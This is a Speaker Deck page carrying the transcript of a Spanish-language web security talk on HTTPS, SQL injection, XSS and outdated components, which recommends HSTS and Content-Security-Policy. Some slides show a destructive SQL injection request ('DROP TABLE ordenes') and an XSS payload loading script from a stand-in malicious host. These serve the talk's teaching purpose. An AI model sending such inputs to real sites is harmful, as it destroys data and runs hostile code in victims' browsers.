Upgrade to PRO for Only $50/Year—Limited-Time Offer! 🔥
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
There Is No Silver Bullet (Español)
Search
Harley Watson
November 29, 2014
Programming
0
170
There Is No Silver Bullet (Español)
Harley Watson
November 29, 2014
Tweet
Share
More Decks by Harley Watson
See All by Harley Watson
paper tickets > smartcards, probably.
unlobito
0
7.7k
one, two step
unlobito
0
820
What's in your pocket? (BSides Manchester)
unlobito
0
1k
sorry, we're cash only. (securi-tay)
unlobito
1
1.2k
Sorry, we're cash only. (hacksoc)
unlobito
0
110
There Is No Silver Bullet
unlobito
0
960
Other Decks in Programming
See All in Programming
俺流レスポンシブコーディング 2025
tak_dcxi
14
8.6k
認証・認可の基本を学ぼう前編
kouyuume
0
200
DevFest Android in Korea 2025 - 개발자 커뮤니티를 통해 얻는 가치
wisemuji
0
130
これだけで丸わかり!LangChain v1.0 アップデートまとめ
os1ma
6
1.8k
生成AIを利用するだけでなく、投資できる組織へ
pospome
1
310
手が足りない!兼業データエンジニアに必要だったアーキテクチャと立ち回り
zinkosuke
0
630
從冷知識到漏洞,你不懂的 Web,駭客懂 - Huli @ WebConf Taiwan 2025
aszx87410
2
2.3k
令和最新版Android Studioで化石デバイス向けアプリを作る
arkw
0
390
20 years of Symfony, what's next?
fabpot
2
350
【CA.ai #3】ワークフローから見直すAIエージェント — 必要な場面と“選ばない”判断
satoaoaka
0
240
ゲームの物理 剛体編
fadis
0
330
251126 TestState APIってなんだっけ?Step Functionsテストどう変わる?
east_takumi
0
310
Featured
See All Featured
CSS Pre-Processors: Stylus, Less & Sass
bermonpainter
359
30k
Let's Do A Bunch of Simple Stuff to Make Websites Faster
chriscoyier
508
140k
Building Applications with DynamoDB
mza
96
6.8k
Building Better People: How to give real-time feedback that sticks.
wjessup
370
20k
ピンチをチャンスに:未来をつくるプロダクトロードマップ #pmconf2020
aki_iinuma
128
54k
jQuery: Nuts, Bolts and Bling
dougneiner
65
8.2k
Rebuilding a faster, lazier Slack
samanthasiow
84
9.3k
[RailsConf 2023 Opening Keynote] The Magic of Rails
eileencodes
31
9.8k
A Modern Web Designer's Workflow
chriscoyier
698
190k
Evolution of real-time – Irina Nazarova, EuRuKo, 2024
irinanazarova
9
1.1k
The Illustrated Children's Guide to Kubernetes
chrisshort
51
51k
Producing Creativity
orderedlist
PRO
348
40k
Transcript
there is no silver bullet Henri Watson
¿Cuáles son los problemas que comúnmente afectan a las
aplicaciones web en la República Dominicana?
Una falta de HTTPS
Usar HTTPS no te va a quitar el pica
pollo del día.
La propuesta actual para HTTP/2.0 obliga el uso de
TLS.
Si decides usar HTTPS, también usa Strict-‐Transport-‐Security y
ssllabs.com/ssltest
Inyecciones SQL
GET /rastreador?orden=12345”; DROP TABLE ordenes;-‐-‐ SELECT * FROM
ordenes WHERE orden = “12345”; DROP TABLE ordenes;-‐-‐” AND estado = “pendiente” Solicitud del cliente al servidor. Solicitud del servidor web a la base de datos.
None
None
None
Problemas en el manejo de autenacación
None
None
Cross-‐Site Scripang (XSS)
GET /hola?nombre=<script src=“hhp://malva.do/ jajaxddd.js”></script> ¡Hola, <script src=“hhp://malva.do/jajaxddd.js”></ script>!
Solicitud del cliente al servidor. Respuesta del servidor al cliente.
Content-‐Security-‐Policy
Exposición de datos sensiavos
None
Ualizando Componentes con Vulnerabilidades Conocidas
Mailing Lists • bugtraq hhp://www.securityfocus.com/archive/1 • debian-‐security-‐announce
hhps://lists.debian.org/debian-‐security-‐announce/ • fulldisclosure hhp://nmap.org/mailman/lisanfo/fulldisclosure
Mailing Lists •
[email protected]
hhps://hhpd.apache.org/lists.html#hhp-‐announce • nginx-‐announce
hhp://mailman.nginx.org/mailman/lisanfo/nginx-‐ announce • php-‐announce hhp://php.net/mailing-‐lists.php
None
Servicio a Cliente
None
¿Por qué una no existe una « bala de
plata »?
La seguridad informáaca es una inversión constante.
Heartbleed
Al poner los datos de tus usuarios en riesgo,
también pones tu reputación en riesgo.
¡Gracias! @henriwatson
[email protected]
hhps://henriwatson.com/talks/silverbullet